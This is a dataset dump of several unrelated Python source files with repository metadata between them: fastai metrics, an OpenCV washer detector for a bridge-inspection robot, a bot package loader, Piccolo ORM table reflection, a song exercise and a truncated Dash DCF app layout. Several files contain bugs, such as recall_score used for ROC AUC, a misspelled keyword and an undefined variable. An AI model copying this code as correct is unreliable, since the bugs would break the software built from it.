for multi-label classification problems" return skm_to_fastai(skm.precision_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RecallMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Recall for multi-label classification problems" return skm_to_fastai(skm.recall_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RocAucMulti(thresh=0.5, sigmoid=True, average='macro', sample_weight=None, max_fpr=None): "Area Under the Receiver Operating Characteristic Curve for multi-label binary classification problems" return skm_to_fastai(skm.recall_score, thresh=thresh, sigmoid=sigmoid, flatten=False, laverage=average, sample_weight=sample_weight, max_fpr=max_fpr) #Cell def mse(inp,targ): "Mean squared error between `inp` and `targ`." return F.mse_loss(*flatten_check(inp,targ)) #Cell def _rmse(inp, targ): return torch.sqrt(F.mse_loss(inp, targ)) rmse = AccumMetric(_rmse) rmse.__doc__ = "Root mean squared error" #Cell def mae(inp,targ): "Mean absolute error between `inp` and `targ`." inp,targ = flatten_check(inp,targ) return torch.abs(inp - targ).mean() #Cell def msle(inp, targ): "Mean squared logarithmic error between `inp` and `targ`." inp,targ = flatten_check(inp,targ) return F.mse_loss(torch.log(1 + inp), torch.log(1 + targ)) #Cell def _exp_rmspe(inp,targ): inp,targ = torch.exp(inp),torch.exp(targ) return torch.sqrt(((targ - inp)/targ).pow(2).mean()) exp_rmspe = AccumMetric(_exp_rmspe) exp_rmspe.__doc__ = "Root mean square percentage error of the exponential of predictions and targets" #Cell def ExplainedVariance(sample_weight=None): "Explained variance betzeen predictions and targets" return skm_to_fastai(skm.explained_variance_score, is_class=False, sample_weight=sample_weight) #Cell def R2Score(sample_weight=None): "R2 score betzeen predictions and targets" return skm_to_fastai(skm.r2_score, is_class=False, sample_weight=sample_weight) #Cell def foreground_acc(inp, targ, bkg_idx=0, axis=1): "Computes non-background accuracy for multiclass segmentation" targ = targ.squeeze(1) mask = targ != bkg_idx return (inp.argmax(dim=axis)[mask]==targ[mask]).float().mean() #Cell class Dice(Metric): "Dice coefficient metric for binary target in segmentation" def __init__(self, axis=1): self.axis = axis def reset(self): self.inter,self.union = 0,0 def accumulate(self, learn): pred,targ = flatten_check(learn.pred.argmax(dim=self.axis), learn.y) self.inter += (pred*targ).float().sum().item() self.union += (pred+targ).float().sum().item() @property def value(self): return 2. * self.inter/self.union if self.union > 0 else None #Cell class JaccardCoeff(Dice): "Implemetation of the jaccard coefficient that is lighter in RAM" @property def value(self): return self.inter/(self.union-self.inter) if self.union > 0 else None
en
0.564004
#AUTOGENERATED! DO NOT EDIT! File to edit: dev/13a_metrics.ipynb (unless otherwise specified). #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell
1.629042
2
subpartcode/Camera Vision/objcenter.py
LesterYHZ/Automated-Bridge-Inspection-Robot-Project
1
6627933
# goal of this code is to use OpenCV's Blob detector to detector the washers using an # OpenCV's Canny edge detection filter (not color) # it needs the video frame as an input # outputs the x and y coordinate to the closest blob detected # the blob parameters are needed to limit the things that are detected as a "blob" # in our case we only want the washers to be detected as blobs # import necessary packages import imutils import numpy as np import cv2 global washer_detected class ObjCenter: def __init__(self, blob_canny): # The constructor # load OpenCV's blob detector # setting parameters for detector to detect certain blobs only params = cv2.SimpleBlobDetector_Params() # Change thresholds params.minThreshold = 100 params.maxThreshold = 300 # Filter by Area params.filterByArea = True params.minArea = 10 # params.maxArea = 5000 # Filter by Circularity params.filterByCircularity = True params.minCircularity = 0.1 # params.maxCircularity = 1 # Filter by Convexity params.filterByConvexity = 1 params.minConvexity = 0.2 params.maxConvexity = 1 # Filter by Inertia params.filterByInertia = 1 params.minInertiaRatio = 0.01 # params.maxInertiaRatio = 1 # Create a detector with the specified parameters # blob detector detects blobs from video frame ver = (cv2.__version__).split('.') if int(ver[0]) < 3: self.detector = cv2.SimpleBlobDetector(params) else: self.detector = cv2.SimpleBlobDetector_create(params) def update(self, frame, frameCenter): # convert the frame to grayscale, blur image and extract edges # uses edges to determine a blob (AKA washer) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) blur = cv2.GaussianBlur(gray, (5, 5), 0) canny = cv2.Canny(blur, 10, 50) # detect all blobs in the input frame rects = self.detector.detect(canny) # check to see if a blob was found if len(rects) > 0: # blob is detected # extract x and y coordinates from detected blobs # blob coordinates give the center of blob detected # blobs are numbered from the closet y (base of camera) to the furthers (away from the camera) washer_detected = (len(rects)) print('number of washers', number_blob) # print out number of blobs pts_array = cv2.KeyPoint_convert(rects) # creates an array of the x and y coordinates for center of blobs pts = np.array(pts_array) # converts to an array we can pull from x = pts[0, 0] # closest blob detected x point y = pts[0, 1] # closest blob detected y point blobX = int(x) blobY = int(y) # return the center (x, y)-coordinates of the first/closet blob return ((blobX, blobY), pts[0], number_blob) # otherwise no blobs were found, so return the center of the # frame + 90 and - 90 if len(rects) == 0: while len(rects) == 0: blobX = np.arange(0, (frameCenter + frameCenter/2), 10) blobY = np.arange(0, (frameCenter + frameCenter/2), 10) return ((blobX, blobY)) # return (frameCenter, None)
# goal of this code is to use OpenCV's Blob detector to detector the washers using an # OpenCV's Canny edge detection filter (not color) # it needs the video frame as an input # outputs the x and y coordinate to the closest blob detected # the blob parameters are needed to limit the things that are detected as a "blob" # in our case we only want the washers to be detected as blobs # import necessary packages import imutils import numpy as np import cv2 global washer_detected class ObjCenter: def __init__(self, blob_canny): # The constructor # load OpenCV's blob detector # setting parameters for detector to detect certain blobs only params = cv2.SimpleBlobDetector_Params() # Change thresholds params.minThreshold = 100 params.maxThreshold = 300 # Filter by Area params.filterByArea = True params.minArea = 10 # params.maxArea = 5000 # Filter by Circularity params.filterByCircularity = True params.minCircularity = 0.1 # params.maxCircularity = 1 # Filter by Convexity params.filterByConvexity = 1 params.minConvexity = 0.2 params.maxConvexity = 1 # Filter by Inertia params.filterByInertia = 1 params.minInertiaRatio = 0.01 # params.maxInertiaRatio = 1 # Create a detector with the specified parameters # blob detector detects blobs from video frame ver = (cv2.__version__).split('.') if int(ver[0]) < 3: self.detector = cv2.SimpleBlobDetector(params) else: self.detector = cv2.SimpleBlobDetector_create(params) def update(self, frame, frameCenter): # convert the frame to grayscale, blur image and extract edges # uses edges to determine a blob (AKA washer) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) blur = cv2.GaussianBlur(gray, (5, 5), 0) canny = cv2.Canny(blur, 10, 50) # detect all blobs in the input frame rects = self.detector.detect(canny) # check to see if a blob was found if len(rects) > 0: # blob is detected # extract x and y coordinates from detected blobs # blob coordinates give the center of blob detected # blobs are numbered from the closet y (base of camera) to the furthers (away from the camera) washer_detected = (len(rects)) print('number of washers', number_blob) # print out number of blobs pts_array = cv2.KeyPoint_convert(rects) # creates an array of the x and y coordinates for center of blobs pts = np.array(pts_array) # converts to an array we can pull from x = pts[0, 0] # closest blob detected x point y = pts[0, 1] # closest blob detected y point blobX = int(x) blobY = int(y) # return the center (x, y)-coordinates of the first/closet blob return ((blobX, blobY), pts[0], number_blob) # otherwise no blobs were found, so return the center of the # frame + 90 and - 90 if len(rects) == 0: while len(rects) == 0: blobX = np.arange(0, (frameCenter + frameCenter/2), 10) blobY = np.arange(0, (frameCenter + frameCenter/2), 10) return ((blobX, blobY)) # return (frameCenter, None)
en
0.762008
# goal of this code is to use OpenCV's Blob detector to detector the washers using an # OpenCV's Canny edge detection filter (not color) # it needs the video frame as an input # outputs the x and y coordinate to the closest blob detected # the blob parameters are needed to limit the things that are detected as a "blob" # in our case we only want the washers to be detected as blobs # import necessary packages # The constructor # load OpenCV's blob detector # setting parameters for detector to detect certain blobs only # Change thresholds # Filter by Area # params.maxArea = 5000 # Filter by Circularity # params.maxCircularity = 1 # Filter by Convexity # Filter by Inertia # params.maxInertiaRatio = 1 # Create a detector with the specified parameters # blob detector detects blobs from video frame # convert the frame to grayscale, blur image and extract edges # uses edges to determine a blob (AKA washer) # detect all blobs in the input frame # check to see if a blob was found # blob is detected # extract x and y coordinates from detected blobs # blob coordinates give the center of blob detected # blobs are numbered from the closet y (base of camera) to the furthers (away from the camera) # print out number of blobs # creates an array of the x and y coordinates for center of blobs # converts to an array we can pull from # closest blob detected x point # closest blob detected y point # return the center (x, y)-coordinates of the first/closet blob # otherwise no blobs were found, so return the center of the # frame + 90 and - 90 # return (frameCenter, None)
3.453279
3
bot/exts/__init__.py
sam-heller/sir-lancebot
1
6627934
<gh_stars>1-10 import logging import pkgutil from typing import Iterator __all__ = ("get_package_names",) log = logging.getLogger(__name__) def get_package_names() -> Iterator[str]: """Iterate names of all packages located in /bot/exts/.""" for package in pkgutil.iter_modules(__path__): if package.ispkg: yield package.name
import logging import pkgutil from typing import Iterator __all__ = ("get_package_names",) log = logging.getLogger(__name__) def get_package_names() -> Iterator[str]: """Iterate names of all packages located in /bot/exts/.""" for package in pkgutil.iter_modules(__path__): if package.ispkg: yield package.name
en
0.985517
Iterate names of all packages located in /bot/exts/.
2.438308
2
piccolo/table_reflection.py
techolas23/piccolo
6
6627935
""" This is an advanced Piccolo feature which allows runtime reflection of database tables. """ import asyncio import typing as t from dataclasses import dataclass from piccolo.apps.schema.commands.generate import get_output_schema from piccolo.table import Table class Immutable(object): def _immutable(self, *args, **kwargs) -> TypeError: raise TypeError("%s object is immutable" % self.__class__.__name__) __delitem__ = __setitem__ = __setattr__ = _immutable # type: ignore class ImmutableDict(Immutable, dict): # type: ignore """A dictionary that is not publicly mutable.""" clear = pop = popitem = setdefault = update = Immutable._immutable # type: ignore # noqa: E501 def __new__(cls, *args): return dict.__new__(cls) def copy(self): raise NotImplementedError( "an immutabledict shouldn't need to be copied. use dict(d) " "if you need a mutable dictionary." ) def __reduce__(self): return ImmutableDict, (dict(self),) def _insert_item(self, key, value) -> None: """ insert an item into the dictionary directly. """ dict.__setitem__(self, key, value) def _delete_item(self, key) -> None: """ Delete an item from dictionary directly. """ dict.__delitem__(self, key) def __repr__(self): return f"ImmutableDict({dict.__repr__(self)})" class Singleton(type): """ A metaclass that creates a Singleton base class when called. """ _instances: t.Dict = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__( *args, **kwargs ) return cls._instances[cls] @dataclass class TableNameDetail: name: str = "" schema: str = "" class TableStorage(metaclass=Singleton): """ A singleton object to store and access reflected tables. Currently it just works with Postgres. """ def __init__(self): self.tables = ImmutableDict() self._schema_tables = {} async def reflect( self, schema_name: str = "public", include: t.Union[t.List[str], str, None] = None, exclude: t.Union[t.List[str], str, None] = None, keep_existing: bool = False, ) -> None: """ Imports tables from the database into ``Table`` objects without hard-coding them. If a table has a reference to another table, the referenced table will be imported too. Reflection can have a performance impact based on the number of tables. If you want to reflect your whole database, make sure to only do it once or use the provided parameters instead of reflecting the whole database every time. :param schema_name: Name of the schema you want to reflect. :param include: It will only reflect the specified tables. Can be a list of tables or a single table. :param exclude: It won't reflect the specified tables. Can be a list of tables or a single table. :param keep_existing: If True, it will exclude the available tables and reflects the currently unavailable ones. Default is False. :returns: None """ include_list = self._to_list(include) exclude_list = self._to_list(exclude) if keep_existing: exclude += self._schema_tables.get(schema_name, []) output_schema = await get_output_schema( schema_name=schema_name, include=include_list, exclude=exclude_list ) add_tables = [ self._add_table(schema_name=schema_name, table=table) for table in output_schema.tables ] await asyncio.gather(*add_tables) def clear(self) -> None: """ Removes all the tables within ``TableStorage``. :returns: None """ dict.clear(self.tables) self._schema_tables.clear() async def get_table(self, tablename: str) -> t.Optional[t.Type[Table]]: """ Returns the ``Table`` class if it exists. If the table is not present in ``TableStorage``, it will try to reflect it. :param tablename: The name of the table, schema name included. If the schema is public, it's not necessary. For example: "public.manager" or "manager", "test_schema.test_table". :returns: Table | None """ table_class = self.tables.get(tablename) if table_class is None: tableNameDetail = self._get_schema_and_table_name(tablename) await self.reflect( schema_name=tableNameDetail.schema, include=[tableNameDetail.name], ) table_class = self.tables.get(tablename) return table_class async def _add_table(self, schema_name: str, table: t.Type[Table]) -> None: if issubclass(table, Table): table_name = self._get_table_name( table._meta.tablename, schema_name ) self.tables._insert_item(table_name, table) self._add_to_schema_tables( schema_name=schema_name, table_name=table._meta.tablename ) def _add_to_schema_tables(self, schema_name: str, table_name: str) -> None: """ We keep record of schemas and their tables for easy use. This method adds a table to its schema. """ schema_tables = self._schema_tables.get(schema_name) if schema_tables is None: self._schema_tables[schema_name] = [] else: self._schema_tables[schema_name].append(table_name) @staticmethod def _get_table_name(name: str, schema: str): if schema == "public": return name else: return schema + "." + name def __repr__(self): return f"{[tablename for tablename, _ in self.tables.items()]}" @staticmethod def _get_schema_and_table_name(tablename: str) -> TableNameDetail: """ Extract schema name and table name from full name of the table. :param tablename: The full name of the table. :returns: Returns the name of the schema and the table. """ tablename_list = tablename.split(".") if len(tablename_list) == 2: return TableNameDetail( name=tablename_list[1], schema=tablename_list[0] ) elif len(tablename_list) == 1: return TableNameDetail(name=tablename_list[0], schema="public") else: raise ValueError("Couldn't find schema name.") @staticmethod def _to_list(value: t.Any) -> t.List: if isinstance(value, list): return value elif isinstance(value, (tuple, set)): return list(value) elif isinstance(value, str): return [value] return []
""" This is an advanced Piccolo feature which allows runtime reflection of database tables. """ import asyncio import typing as t from dataclasses import dataclass from piccolo.apps.schema.commands.generate import get_output_schema from piccolo.table import Table class Immutable(object): def _immutable(self, *args, **kwargs) -> TypeError: raise TypeError("%s object is immutable" % self.__class__.__name__) __delitem__ = __setitem__ = __setattr__ = _immutable # type: ignore class ImmutableDict(Immutable, dict): # type: ignore """A dictionary that is not publicly mutable.""" clear = pop = popitem = setdefault = update = Immutable._immutable # type: ignore # noqa: E501 def __new__(cls, *args): return dict.__new__(cls) def copy(self): raise NotImplementedError( "an immutabledict shouldn't need to be copied. use dict(d) " "if you need a mutable dictionary." ) def __reduce__(self): return ImmutableDict, (dict(self),) def _insert_item(self, key, value) -> None: """ insert an item into the dictionary directly. """ dict.__setitem__(self, key, value) def _delete_item(self, key) -> None: """ Delete an item from dictionary directly. """ dict.__delitem__(self, key) def __repr__(self): return f"ImmutableDict({dict.__repr__(self)})" class Singleton(type): """ A metaclass that creates a Singleton base class when called. """ _instances: t.Dict = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__( *args, **kwargs ) return cls._instances[cls] @dataclass class TableNameDetail: name: str = "" schema: str = "" class TableStorage(metaclass=Singleton): """ A singleton object to store and access reflected tables. Currently it just works with Postgres. """ def __init__(self): self.tables = ImmutableDict() self._schema_tables = {} async def reflect( self, schema_name: str = "public", include: t.Union[t.List[str], str, None] = None, exclude: t.Union[t.List[str], str, None] = None, keep_existing: bool = False, ) -> None: """ Imports tables from the database into ``Table`` objects without hard-coding them. If a table has a reference to another table, the referenced table will be imported too. Reflection can have a performance impact based on the number of tables. If you want to reflect your whole database, make sure to only do it once or use the provided parameters instead of reflecting the whole database every time. :param schema_name: Name of the schema you want to reflect. :param include: It will only reflect the specified tables. Can be a list of tables or a single table. :param exclude: It won't reflect the specified tables. Can be a list of tables or a single table. :param keep_existing: If True, it will exclude the available tables and reflects the currently unavailable ones. Default is False. :returns: None """ include_list = self._to_list(include) exclude_list = self._to_list(exclude) if keep_existing: exclude += self._schema_tables.get(schema_name, []) output_schema = await get_output_schema( schema_name=schema_name, include=include_list, exclude=exclude_list ) add_tables = [ self._add_table(schema_name=schema_name, table=table) for table in output_schema.tables ] await asyncio.gather(*add_tables) def clear(self) -> None: """ Removes all the tables within ``TableStorage``. :returns: None """ dict.clear(self.tables) self._schema_tables.clear() async def get_table(self, tablename: str) -> t.Optional[t.Type[Table]]: """ Returns the ``Table`` class if it exists. If the table is not present in ``TableStorage``, it will try to reflect it. :param tablename: The name of the table, schema name included. If the schema is public, it's not necessary. For example: "public.manager" or "manager", "test_schema.test_table". :returns: Table | None """ table_class = self.tables.get(tablename) if table_class is None: tableNameDetail = self._get_schema_and_table_name(tablename) await self.reflect( schema_name=tableNameDetail.schema, include=[tableNameDetail.name], ) table_class = self.tables.get(tablename) return table_class async def _add_table(self, schema_name: str, table: t.Type[Table]) -> None: if issubclass(table, Table): table_name = self._get_table_name( table._meta.tablename, schema_name ) self.tables._insert_item(table_name, table) self._add_to_schema_tables( schema_name=schema_name, table_name=table._meta.tablename ) def _add_to_schema_tables(self, schema_name: str, table_name: str) -> None: """ We keep record of schemas and their tables for easy use. This method adds a table to its schema. """ schema_tables = self._schema_tables.get(schema_name) if schema_tables is None: self._schema_tables[schema_name] = [] else: self._schema_tables[schema_name].append(table_name) @staticmethod def _get_table_name(name: str, schema: str): if schema == "public": return name else: return schema + "." + name def __repr__(self): return f"{[tablename for tablename, _ in self.tables.items()]}" @staticmethod def _get_schema_and_table_name(tablename: str) -> TableNameDetail: """ Extract schema name and table name from full name of the table. :param tablename: The full name of the table. :returns: Returns the name of the schema and the table. """ tablename_list = tablename.split(".") if len(tablename_list) == 2: return TableNameDetail( name=tablename_list[1], schema=tablename_list[0] ) elif len(tablename_list) == 1: return TableNameDetail(name=tablename_list[0], schema="public") else: raise ValueError("Couldn't find schema name.") @staticmethod def _to_list(value: t.Any) -> t.List: if isinstance(value, list): return value elif isinstance(value, (tuple, set)): return list(value) elif isinstance(value, str): return [value] return []
en
0.759556
This is an advanced Piccolo feature which allows runtime reflection of database tables. # type: ignore # type: ignore A dictionary that is not publicly mutable. # type: ignore # noqa: E501 insert an item into the dictionary directly. Delete an item from dictionary directly. A metaclass that creates a Singleton base class when called. A singleton object to store and access reflected tables. Currently it just works with Postgres. Imports tables from the database into ``Table`` objects without hard-coding them. If a table has a reference to another table, the referenced table will be imported too. Reflection can have a performance impact based on the number of tables. If you want to reflect your whole database, make sure to only do it once or use the provided parameters instead of reflecting the whole database every time. :param schema_name: Name of the schema you want to reflect. :param include: It will only reflect the specified tables. Can be a list of tables or a single table. :param exclude: It won't reflect the specified tables. Can be a list of tables or a single table. :param keep_existing: If True, it will exclude the available tables and reflects the currently unavailable ones. Default is False. :returns: None Removes all the tables within ``TableStorage``. :returns: None Returns the ``Table`` class if it exists. If the table is not present in ``TableStorage``, it will try to reflect it. :param tablename: The name of the table, schema name included. If the schema is public, it's not necessary. For example: "public.manager" or "manager", "test_schema.test_table". :returns: Table | None We keep record of schemas and their tables for easy use. This method adds a table to its schema. Extract schema name and table name from full name of the table. :param tablename: The full name of the table. :returns: Returns the name of the schema and the table.
2.569912
3
Farm.py
queengroot/Python-Old-McDonald
0
6627936
#<NAME> #Practice #<NAME> def chorus(animal, sound): print("<NAME> had a farm, E-I-E-I-O, and on that farm he had a " + animal + " E-I-E-I-O.") print("With a " + sound + " " + sound + " here and a " + sound + " " + sound+ " there. ") print("Here a " + sound + " there a "+ sound + " everywhere a " + sound + " " + sound) print("OldMacDonald had a farm, E-I-E-I-O.") def ending (sound): print("With a " + sound + " " + sound + " here and a " + sound + " " + sound+ " there.") print("Here a " + sound + " there a " + sound +" everywhere a " + sound + " " + sound) def title(): print("Old McDonald Had A Farm Program") def main(): #variables soundSingle = "" animalSingle = "" choice = "y" animals = [] sounds = [] length = 0 lengthSound = 0 #call title title() print() while choice.lower() == "y": animalSingle = input("Please enter an animal name: ") animals.append(animalSingle) print() soundSingle = input("Please enter the sound that animal makes: ") sounds.append(soundSingle) print() choice = input("Enter another animal? Y/N? ") print() length = len(animals) i = 0 #while i is less than the length of the string go through each array #i is 0, so it points to the first spot in the array! #then when it becomes one it goes to the next spot in the array. while i < length: chorus(animals[i],sounds[i]) i+=1 print() print() lengthSound = len(sounds) #call backwards #subtract two from the length, thus not repeating the last cluck cluck #have to subtract two because arrays start at 0 j = lengthSound - 2 while j >= 0: ending(sounds[j]) j -= 1 print("<NAME> had a farm E-I-E-I-OOOOOOO.........") print() print("Thanks for singing along!") print("This is changes to see how branches work") main()
#<NAME> #Practice #<NAME> def chorus(animal, sound): print("<NAME> had a farm, E-I-E-I-O, and on that farm he had a " + animal + " E-I-E-I-O.") print("With a " + sound + " " + sound + " here and a " + sound + " " + sound+ " there. ") print("Here a " + sound + " there a "+ sound + " everywhere a " + sound + " " + sound) print("OldMacDonald had a farm, E-I-E-I-O.") def ending (sound): print("With a " + sound + " " + sound + " here and a " + sound + " " + sound+ " there.") print("Here a " + sound + " there a " + sound +" everywhere a " + sound + " " + sound) def title(): print("Old McDonald Had A Farm Program") def main(): #variables soundSingle = "" animalSingle = "" choice = "y" animals = [] sounds = [] length = 0 lengthSound = 0 #call title title() print() while choice.lower() == "y": animalSingle = input("Please enter an animal name: ") animals.append(animalSingle) print() soundSingle = input("Please enter the sound that animal makes: ") sounds.append(soundSingle) print() choice = input("Enter another animal? Y/N? ") print() length = len(animals) i = 0 #while i is less than the length of the string go through each array #i is 0, so it points to the first spot in the array! #then when it becomes one it goes to the next spot in the array. while i < length: chorus(animals[i],sounds[i]) i+=1 print() print() lengthSound = len(sounds) #call backwards #subtract two from the length, thus not repeating the last cluck cluck #have to subtract two because arrays start at 0 j = lengthSound - 2 while j >= 0: ending(sounds[j]) j -= 1 print("<NAME> had a farm E-I-E-I-OOOOOOO.........") print() print("Thanks for singing along!") print("This is changes to see how branches work") main()
en
0.874812
#<NAME> #Practice #<NAME> #variables #call title #while i is less than the length of the string go through each array #i is 0, so it points to the first spot in the array! #then when it becomes one it goes to the next spot in the array. #call backwards #subtract two from the length, thus not repeating the last cluck cluck #have to subtract two because arrays start at 0
4.059488
4
src/api/schemas/parts.py
skbu3u/core
1
6627937
<filename>src/api/schemas/parts.py import re from typing import List from pydantic import BaseModel, validator from src.api.schemas.consumables import Consumable class PartCreate(BaseModel): name: str price: int compatibility: str @validator('name') def name_match(cls, name): if not re.match(r'^[\w\s.-]+$', name): raise ValueError(f"Name '{name}' is incorrect") return name.lower() # TODO Add price validations for parts @validator('compatibility') def compatibility_match(cls, compatibility): return compatibility.lower() class Part(PartCreate): id: int contains: List[Consumable] = [] class Config: orm_mode = True
<filename>src/api/schemas/parts.py import re from typing import List from pydantic import BaseModel, validator from src.api.schemas.consumables import Consumable class PartCreate(BaseModel): name: str price: int compatibility: str @validator('name') def name_match(cls, name): if not re.match(r'^[\w\s.-]+$', name): raise ValueError(f"Name '{name}' is incorrect") return name.lower() # TODO Add price validations for parts @validator('compatibility') def compatibility_match(cls, compatibility): return compatibility.lower() class Part(PartCreate): id: int contains: List[Consumable] = [] class Config: orm_mode = True
en
0.575527
# TODO Add price validations for parts
2.746345
3
application/api/resources/images_list.py
imghack/image_bot
3
6627938
from flask_restful import Resource # TODO: db connection should be one for all blueprints from application.db.db import get_all_images class ImagesList(Resource): def get(self): return get_all_images()
from flask_restful import Resource # TODO: db connection should be one for all blueprints from application.db.db import get_all_images class ImagesList(Resource): def get(self): return get_all_images()
en
0.748234
# TODO: db connection should be one for all blueprints
2.394089
2
layouts.py
codepatel/dcf
1
6627939
<filename>layouts.py from math import log10 import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc import dash_table as dt # Local imports from __init__ import VERSION, DEFAULT_TICKER, DEFAULT_SNAPSHOT_UUID from dash_utils import make_card, ticker_inputs, make_item, make_social_media_share from dynamic_layouts import get_dcf_current_year_input_overrides, get_other_input_overrides from assets.about import source_credits, assumptions from assets.disclaimer import disclaimer # Reference and some Dashboard components inspired by: https://medium.com/swlh/how-to-create-a-dashboard-to-dominate-the-stock-market-using-python-and-dash-c35a12108c93 navheader = dbc.Row([dbc.Col( dbc.Nav([ dbc.NavLink("Main", href="/", id='nav-main'), dbc.NavLink("DCF Valuation Analysis", href="/apps/dcf/AAPL", id='nav-dcf'), dbc.NavLink("Sector Value Analysis", href="/apps/sector", id='nav-sector'), ], pills=True), ), dbc.Col(id='social-share', align='right', width=400), dbc.Col([html.Small('VERSION:'), html.P(VERSION)], align='right', width=60) ]) tabheader = html.Div([ dbc.Tabs([ dbc.Tab(label="DCF Valuation Analysis", tab_id="tab-dcf"), dbc.Tab(label="Sector Value Analysis", tab_id="tab-sector"), ], id="tabs", active_tab="tab-dcf", ), html.Div(id="tab-content"), ]) dcflayout = html.Div([ navheader, # html.H3('DCF Valuation Analysis'), # MD text area Element for Introduction dbc.Row([dbc.Col( [dcc.Markdown(children=''' ### Purpose of this web app ### ##### To be one of the tools to educate and democratize fundamentals DCF (Discounted Cash Flow) Valuation Analysis of public equity investments ##### See below for more details, Assumptions and Disclaimer or visit [About this DCF Valuation App](https://codepatel.github.io/dcf/) ''' )], ), ]), # heading row dbc.Row([ dbc.Col([ make_card("Ticker for Analysis", "info", [ticker_inputs('ticker-input', 'date-picker', 12*5), # dbc.Select( # id='ticker-input', # options=[{'label': s['symbol']+'('+s['exchange']+'):'+s['name'], 'value': s['symbol']} for s in symdata], # value='AAPL', # placeholder='Start typing Ticker, press Enter'), dbc.FormGroup( [ dbc.Label("Analysis mode selection: (if inactive, use Snapshot mode)"), dbc.Checklist( options=[ {"label": "Live?", "value": 1}, ], value=[1], id="analysis-mode", switch=True, ), ] ), html.Data(id='snapshot-uuid', value=DEFAULT_SNAPSHOT_UUID), html.Div([dbc.Button('Save Snapshot', id='save-snapshot', color='primary'), html.Span(dbc.NavLink('Snapshot Link to Bookmark', id='snapshot-link', href='/apps/dcf/'+DEFAULT_TICKER+'/'+DEFAULT_SNAPSHOT_UUID, disabled=True), style={"vertical-align": "middle"}), ]), ]), html.Div(id='ticker-allcaps'), make_card('Status Message', 'success', dbc.Spinner(html.P(id='status-info', loading_state={'is_loading': True}), fullscreen=False)), make_card('Supplemental Info', 'success', dbc.Spinner([html.P(id='supp-info'), dcc.Store(id='fin-store'), dcc.Store(id='dcf-store'), dcc.Store(id='topsstream-data'), dcc.Store(id="handler-parseURL"), dcc.Store(id="handler-ticker-valid"), dcc.Store(id="handler-past-data"), dcc.Store(id="handler-dcf-data"), dcc.Store(id='handler-lastpricestream'), dcc.Interval( id='price-update-interval', interval=15*1000, # in milliseconds n_intervals=0 ) ])) ]), dbc.Col([ make_card('DCF Inputs - Company factors', 'info', dbc.Tabs([ dbc.Tab( dbc.Form([ dbc.Label("Revenue Growth Rate (%) for next year", html_for="rgr-next"), dbc.Input(id="rgr-next", type="number", value=0, min=-50, step=0.1, placeholder="Enter number", debounce=True ), dbc.Label("Operating Margin (%) for next year excl. Reinvestment", html_for="opm-next"), dbc.Input(id="opm-next", type="number", value=0, max=50, step=0.1, placeholder="Enter number", debounce=True ), html.Br(), dbc.Label("CAGR (%) for years 2-5 (select range: 0 to 15)", html_for="cagr-2-5"), dcc.Slider(id="cagr-2-5", min=0, max=15, step=0.1, value=5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 16)}), dbc.Label("Target Pre-Tax Operating Margin (%) in business model (select range: 0 to 50)", html_for="opm-target"), dcc.Slider(id="opm-target", min=0, max=50, step=0.1, value=20, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 55, 5)}), dbc.Label("Sales to capital ratio (for computing reinvestment, select range: 0 to 5)", html_for="sales-to-cap"), dcc.Slider(id="sales-to-cap", min=0, max=5, step=0.01, value=1, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}), ]), label="GPE Levers", tab_id="tab-lever", label_style={"color": "#00AEF9"} ), dbc.Tab( dbc.Form([ html.P('In future, calculate Equity Risk Premium based on discrete inputs. For now, enter ERP:'), html.Br(), dbc.Label("Equity Risk Premium (%)", html_for="erp-calculated"), dbc.Input(id="erp-calculated", type="number", value=6, min=0, max=10, step=0.01, placeholder="Enter number", debounce=True ), ]), label="ERP Calculation", tab_id="tab-erp", label_style={"color": "#00AEF9"} ), ], id="company-tabs", active_tab="tab-lever", )) ]), dbc.Col([ make_card('DCF Inputs - Environmental factors', 'info', dbc.Form([ dbc.Label("Effective Tax Rate (%) (select range: 0 to 30)", html_for="tax-rate"), dcc.Slider(id="tax-rate", min=0, max=30, step=0.1, value=15, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 35, 5)}), dbc.Label("Riskfree Rate (%) (select range: 0 to 5)", html_for="riskfree-rate"), dcc.Slider(id="riskfree-rate", min=0, max=5, step=0.25, value=1.25, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}), dbc.Label("Terminal Growth Rate (%) (select range: 0 to 5)", html_for="terminal-growth-rate"), dcc.Slider(id="terminal-growth-rate", min=0, max=5, step=0.25, value=3.5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}, disabled=False), dbc.Label("Cost of Capital / Discount Rate (%) (select range: 0 to 15)", html_for="cost-of-cap"), dcc.Slider(id="cost-of-cap", min=0, max=15, step=0.25, value=8.5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 16)}), ])), make_card('DCF Outputs', 'success', dbc.Spinner(html.Div(id="dcf-data"))) ]), ]), #row 1 # Element for Graph plot of KPIndicators dbc.Row([ dbc.Col([ make_card("Past records Financial table (Current Year is TTM/MRQ) ", "secondary", dbc.Spinner(html.Div(id="fin-table"))), html.Small([html.A('Data source: Marketwatch.com', href='https://www.marketwatch.com/investing/stock/aapl/financials'), html.P('Copyright 2020 FactSet Research Systems Inc. All rights reserved. Source FactSet Fundamentals'), ]) ]), dbc.Col([html.Div([ html.H6('Select Parameter(s) to show trend over the past periods'), dcc.Dropdown( id='select-column', value=['ROCE(%)', 